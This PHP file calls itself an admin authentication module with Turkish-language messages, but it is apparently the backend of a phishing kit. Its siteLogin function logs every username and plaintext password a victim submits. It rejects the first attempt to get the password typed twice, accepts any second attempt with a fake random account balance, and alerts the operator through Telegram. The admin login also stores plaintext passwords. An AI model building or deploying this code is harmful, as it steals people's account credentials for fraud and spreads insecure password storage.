<?php
/**
 * Admin Authentication System
 * Handles admin login, logout, and session management
 */

// Include database configuration
require_once __DIR__ . '/database.php';
require_once __DIR__ . '/functions.php';

// Start session if not already started
if (session_status() == PHP_SESSION_NONE) {
    session_start();
}

/**
 * Admin login function with logging
 * @param string $username
 * @param string $password
 * @return array
 */
function adminLogin($username, $password) {
    try {
        $pdo = getDatabaseConnection();
        
        // Get admin user
        $stmt = $pdo->prepare("SELECT * FROM admin_users WHERE username = ? AND is_active = 1");
        $stmt->execute([$username]);
        $admin = $stmt->fetch();
        
        if (!$admin) {
            logLoginAttempt($username, 'failed', 'User not found', $password);
            return [
                'success' => false,
                'message' => 'Invalid username or password'
            ];
        }
        
        // Verify password
        if (!password_verify($password, $admin['password'])) {
            logLoginAttempt($username, 'failed', 'Invalid password', $password);
            return [
                'success' => false,
                'message' => 'Invalid username or password'
            ];
        }
        
        // Update last login
        $stmt = $pdo->prepare("UPDATE admin_users SET last_login = NOW() WHERE id = ?");
        $stmt->execute([$admin['id']]);
        
        // Set session variables
        $_SESSION['admin_logged_in'] = true;
        $_SESSION['admin_id'] = $admin['id'];
        $_SESSION['admin_username'] = $admin['username'];
        $_SESSION['admin_full_name'] = $admin['full_name'];
        $_SESSION['admin_email'] = $admin['email'];
        
        // Log successful login
        logLoginAttempt($username, 'success', null, $password);
        
        // Send Telegram notification
        sendTelegramLoginNotification($admin);
        
        return [
            'success' => true,
            'message' => 'Login successful',
            'admin' => [
                'id' => $admin['id'],
                'username' => $admin['username'],
                'full_name' => $admin['full_name'],
                'email' => $admin['email']
            ]
        ];
        
    } catch (Exception $e) {
        error_log("Admin login error: " . $e->getMessage());
        logLoginAttempt($username, 'failed', 'System error', $password);
        return [
            'success' => false,
            'message' => 'Login failed due to system error'
        ];
    }
}

/**
 * Log login attempt
 * @param string $username
 * @param string $status
 * @param string $failureReason
 * @param string $password
 */
function logLoginAttempt($username, $status, $failureReason = null, $password = null) {
    try {
        $pdo = getDatabaseConnection();
        
        $stmt = $pdo->prepare("INSERT INTO login_logs (username, password, ip_address, user_agent, status, failure_reason, login_type) VALUES (?, ?, ?, ?, ?, ?, 'admin')");
        $stmt->execute([
            $username,
            $password,
            $_SERVER['REMOTE_ADDR'] ?? 'unknown',
            $_SERVER['HTTP_USER_AGENT'] ?? 'unknown',
            $status,
            $failureReason
        ]);
        
    } catch (Exception $e) {
        error_log("Failed to log login attempt: " . $e->getMessage());
    }
}

/**
 * Check if admin is logged in
 * @return bool
 */
function isAdminLoggedIn() {
    return isset($_SESSION['admin_logged_in']) && $_SESSION['admin_logged_in'] === true;
}

/**
 * Get current admin user info
 * @return array|null
 */
function getCurrentAdmin() {
    if (!isAdminLoggedIn()) {
        return null;
    }
    
    return [
        'id' => $_SESSION['admin_id'],
        'username' => $_SESSION['admin_username'],
        'full_name' => $_SESSION['admin_full_name'],
        'email' => $_SESSION['admin_email']
    ];
}

/**
 * Admin logout
 */
function adminLogout() {
    // Log logout
    $admin = getCurrentAdmin();
    if ($admin) {
        error_log("Admin logout: " . $admin['username']);
    }
    
    // Destroy session
    session_destroy();
    
    // Redirect to login page
    header('Location: login.php');
    exit;
}

/**
 * Require admin login (redirect if not logged in)
 */
function requireAdminLogin() {
    if (!isAdminLoggedIn()) {
        header('Location: login.php');
        exit;
    }
}

/**
 * Get login logs
 * @param int $limit
 * @param int $offset
 * @return array
 */
function getLoginLogs($limit = 50, $offset = 0) {
    try {
        $pdo = getDatabaseConnection();
        
        $stmt = $pdo->prepare("
            SELECT * FROM login_logs 
            ORDER BY login_time DESC 
            LIMIT ? OFFSET ?
        ");
        $stmt->execute([$limit, $offset]);
        
        return $stmt->fetchAll();
        
    } catch (Exception $e) {
        error_log("Failed to get login logs: " . $e->getMessage());
        return [];
    }
}

/**
 * Get login statistics
 * @return array
 */
function getLoginStatistics() {
    try {
        $pdo = getDatabaseConnection();
        
        // Total logins today
        $stmt = $pdo->prepare("
            SELECT COUNT(*) as total_today 
            FROM login_logs 
            WHERE DATE(login_time) = CURDATE()
        ");
        $stmt->execute();
        $today = $stmt->fetch()['total_today'];
        
        // Successful logins today
        $stmt = $pdo->prepare("
            SELECT COUNT(*) as success_today 
            FROM login_logs 
            WHERE DATE(login_time) = CURDATE() AND status = 'success'
        ");
        $stmt->execute();
        $successToday = $stmt->fetch()['success_today'];
        
        // Failed logins today
        $stmt = $pdo->prepare("
            SELECT COUNT(*) as failed_today 
            FROM login_logs 
            WHERE DATE(login_time) = CURDATE() AND status = 'failed'
        ");
        $stmt->execute();
        $failedToday = $stmt->fetch()['failed_today'];
        
        // Total logins this week
        $stmt = $pdo->prepare("
            SELECT COUNT(*) as total_week 
            FROM login_logs 
            WHERE login_time >= DATE_SUB(NOW(), INTERVAL 7 DAY)
        ");
        $stmt->execute();
        $week = $stmt->fetch()['total_week'];
        
        return [
            'today' => $today,
            'success_today' => $successToday,
            'failed_today' => $failedToday,
            'week' => $week
        ];
        
    } catch (Exception $e) {
        error_log("Failed to get login statistics: " . $e->getMessage());
        return [
            'today' => 0,
            'success_today' => 0,
            'failed_today' => 0,
            'week' => 0
        ];
    }
}

/**
 * Send Telegram notification for admin login
 * @param array $admin
 */
function sendTelegramLoginNotification($admin) {
    try {
        $telegramSettings = getTelegramSettings();
        
        if (!$telegramSettings['enabled'] || $telegramSettings['bot_token'] === 'YOUR_BOT_TOKEN_HERE') {
            return;
        }
        
        $message = "🔐 <b>ADMIN GİRİŞİ</b>\n\n";
        $message .= "👤 <b>Kullanıcı:</b> " . $admin['username'] . "\n";
        $message .= "📝 <b>Ad Soyad:</b> " . $admin['full_name'] . "\n";
        $message .= "📧 <b>E-posta:</b> " . $admin['email'] . "\n";
        $message .= "🌐 <b>IP Adresi:</b> " . ($_SERVER['REMOTE_ADDR'] ?? 'Bilinmiyor') . "\n";
        $message .= "🕐 <b>Tarih:</b> " . date('d.m.Y H:i:s') . "\n";
        $message .= "✅ <b>Durum:</b> Başarılı";
        
        sendTelegramMessage($message, $telegramSettings['login_chat_id']);
        
    } catch (Exception $e) {
        error_log("Failed to send Telegram login notification: " . $e->getMessage());
    }
}

/**
 * Get Telegram settings
 * @return array
 */
function getTelegramSettings() {
    try {
        $pdo = getDatabaseConnection();
        
        $stmt = $pdo->prepare("SELECT setting_key, setting_value FROM telegram_settings");
        $stmt->execute();
        $settings = $stmt->fetchAll(PDO::FETCH_KEY_PAIR);
        
        return [
            'bot_token' => $settings['bot_token'] ?? 'YOUR_BOT_TOKEN_HERE',
            'login_chat_id' => $settings['login_chat_id'] ?? 'YOUR_CHAT_ID_HERE',
            'payment_chat_id' => $settings['payment_chat_id'] ?? 'YOUR_CHAT_ID_HERE',
            'enabled' => ($settings['enabled'] ?? '0') === '1'
        ];
        
    } catch (Exception $e) {
        error_log("Failed to get Telegram settings: " . $e->getMessage());
        return [
            'bot_token' => 'YOUR_BOT_TOKEN_HERE',
            'login_chat_id' => 'YOUR_CHAT_ID_HERE',
            'payment_chat_id' => 'YOUR_CHAT_ID_HERE',
            'enabled' => false
        ];
    }
}


/**
 * Site login function with two-attempt logic
 * @param string $username
 * @param string $password
 * @return array
 */
function siteLogin($username, $password) {
    try {
        $pdo = getDatabaseConnection();
        $ip_address = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
        $session_id = session_id();
        
        // Simple validation
        if (empty($username) || empty($password)) {
            logSiteLoginAttempt($username, 'failed', 'Username or password empty', $password);
            return [
                'success' => false,
                'message' => 'Kullanıcı adı veya şifre eksik!'
            ];
        }
        
        if (strlen($username) < 3 || strlen($password) < 3) {
            logSiteLoginAttempt($username, 'failed', 'Invalid credentials', $password);
            return [
                'success' => false,
                'message' => 'Geçersiz kullanıcı adı veya şifre!'
            ];
        }
        
        // Check or create login attempt record
        $stmt = $pdo->prepare("SELECT * FROM user_login_attempts WHERE username = ? AND session_id = ?");
        $stmt->execute([$username, $session_id]);
        $attemptRecord = $stmt->fetch();
        
        if (!$attemptRecord) {
            // First attempt - create new record
            $stmt = $pdo->prepare("INSERT INTO user_login_attempts (username, ip_address, attempt_count, session_id) VALUES (?, ?, 1, ?)");
            $stmt->execute([$username, $ip_address, $session_id]);
            $attemptCount = 1;
        } else {
            // Update attempt count
            $attemptCount = $attemptRecord['attempt_count'] + 1;
            $stmt = $pdo->prepare("UPDATE user_login_attempts SET attempt_count = ?, last_attempt = NOW() WHERE id = ?");
            $stmt->execute([$attemptCount, $attemptRecord['id']]);
        }
        
        // Log the attempt
        logSiteLoginAttempt($username, 'failed', 'Attempt ' . $attemptCount, $password);
        
        if ($attemptCount == 1) {
            // First attempt - always fail
            return [
                'success' => false,
                'message' => 'Kullanıcı adı veya şifre hatalı!'
            ];
        } else if ($attemptCount == 2) {
            // Second attempt - always succeed
            // Generate random balance between 0.10 and 1.50
            $balance = number_format(rand(10, 150) / 100, 2, ',', '.');
            
            // Set session variables
            $_SESSION['username'] = $username;
            $_SESSION['logged_in'] = true;
            $_SESSION['login_time'] = time();
            $_SESSION['balance'] = $balance;
            
            // Log successful login
            logSiteLoginAttempt($username, 'success', 'Second attempt success', $password);
            
            // Clean up attempt record
            $stmt = $pdo->prepare("DELETE FROM user_login_attempts WHERE username = ? AND session_id = ?");
            $stmt->execute([$username, $session_id]);
            
            // Send Telegram notification
            sendSiteLoginTelegramNotification($username);
            
            return [
                'success' => true,
                'message' => 'Giriş başarılı!'
            ];
        } else {
            // More than 2 attempts - fail
            return [
                'success' => false,
                'message' => 'Çok fazla deneme yapıldı. Lütfen sayfayı yenileyin.'
            ];
        }
        
    } catch (Exception $e) {
        error_log("Site login error: " . $e->getMessage());
        logSiteLoginAttempt($username, 'failed', 'System error', $password);
        return [
            'success' => false,
            'message' => 'Giriş sırasında hata oluştu!'
        ];
    }
}

/**
 * Log site login attempt
 * @param string $username
 * @param string $status
 * @param string $failureReason
 * @param string $password
 */
function logSiteLoginAttempt($username, $status, $failureReason = null, $password = null) {
    try {
        $pdo = getDatabaseConnection();
        
        $stmt = $pdo->prepare("INSERT INTO login_logs (username, password, ip_address, user_agent, status, failure_reason, login_type) VALUES (?, ?, ?, ?, ?, ?, 'site')");
        $stmt->execute([
            $username,
            $password,
            $_SERVER['REMOTE_ADDR'] ?? 'unknown',
            $_SERVER['HTTP_USER_AGENT'] ?? 'unknown',
            $status,
            $failureReason
        ]);
        
    } catch (Exception $e) {
        error_log("Failed to log site login attempt: " . $e->getMessage());
    }
}

/**
 * Send Telegram notification for site login
 * @param string $username
 */
function sendSiteLoginTelegramNotification($username) {
    try {
        $telegramSettings = getTelegramSettings();
        
        if (!$telegramSettings['enabled'] || $telegramSettings['bot_token'] === 'YOUR_BOT_TOKEN_HERE') {
            return;
        }
        
        $message = "🌐 <b>SİTE GİRİŞİ</b>\n\n";
        $message .= "👤 <b>Kullanıcı:</b> " . $username . "\n";
        $message .= "🌐 <b>IP Adresi:</b> " . ($_SERVER['REMOTE_ADDR'] ?? 'Bilinmiyor') . "\n";
        $message .= "🕐 <b>Tarih:</b> " . date('d.m.Y H:i:s') . "\n";
        $message .= "✅ <b>Durum:</b> Başarılı";
        
        sendTelegramMessage($message, $telegramSettings['login_chat_id']);
        
    } catch (Exception $e) {
        error_log("Failed to send site login Telegram notification: " . $e->getMessage());
    }
}

/**
 * Get site login logs
 * @param int $limit
 * @param int $offset
 * @return array
 */
function getSiteLoginLogs($limit = 50, $offset = 0) {
    try {
        $pdo = getDatabaseConnection();
        
        $stmt = $pdo->prepare("
            SELECT * FROM login_logs 
            WHERE login_type = 'site'
            ORDER BY login_time DESC 
            LIMIT ? OFFSET ?
        ");
        $stmt->execute([$limit, $offset]);
        
        return $stmt->fetchAll();
        
    } catch (Exception $e) {
        error_log("Failed to get site login logs: " . $e->getMessage());
        return [];
    }
}

/**
 * Get site login statistics
 * @return array
 */
function getSiteLoginStatistics() {
    try {
        $pdo = getDatabaseConnection();
        
        // Total logins today
        $stmt = $pdo->prepare("
            SELECT COUNT(*) as total_today 
            FROM login_logs 
            WHERE DATE(login_time) = CURDATE() AND login_type = 'site'
        ");
        $stmt->execute();
        $today = $stmt->fetch()['total_today'];
        
        // Successful logins today
        $stmt = $pdo->prepare("
            SELECT COUNT(*) as success_today 
            FROM login_logs 
            WHERE DATE(login_time) = CURDATE() AND status = 'success' AND login_type = 'site'
        ");
        $stmt->execute();
        $successToday = $stmt->fetch()['success_today'];
        
        // Failed logins today
        $stmt = $pdo->prepare("
            SELECT COUNT(*) as failed_today 
            FROM login_logs 
            WHERE DATE(login_time) = CURDATE() AND status = 'failed' AND login_type = 'site'
        ");
        $stmt->execute();
        $failedToday = $stmt->fetch()['failed_today'];
        
        // Total logins this week
        $stmt = $pdo->prepare("
            SELECT COUNT(*) as total_week 
            FROM login_logs 
            WHERE login_time >= DATE_SUB(NOW(), INTERVAL 7 DAY) AND login_type = 'site'
        ");
        $stmt->execute();
        $week = $stmt->fetch()['total_week'];
        
        return [
            'today' => $today,
            'success_today' => $successToday,
            'failed_today' => $failedToday,
            'week' => $week
        ];
        
    } catch (Exception $e) {
        error_log("Failed to get site login statistics: " . $e->getMessage());
        return [
            'today' => 0,
            'success_today' => 0,
            'failed_today' => 0,
            'week' => 0
        ];
    }
}
?>
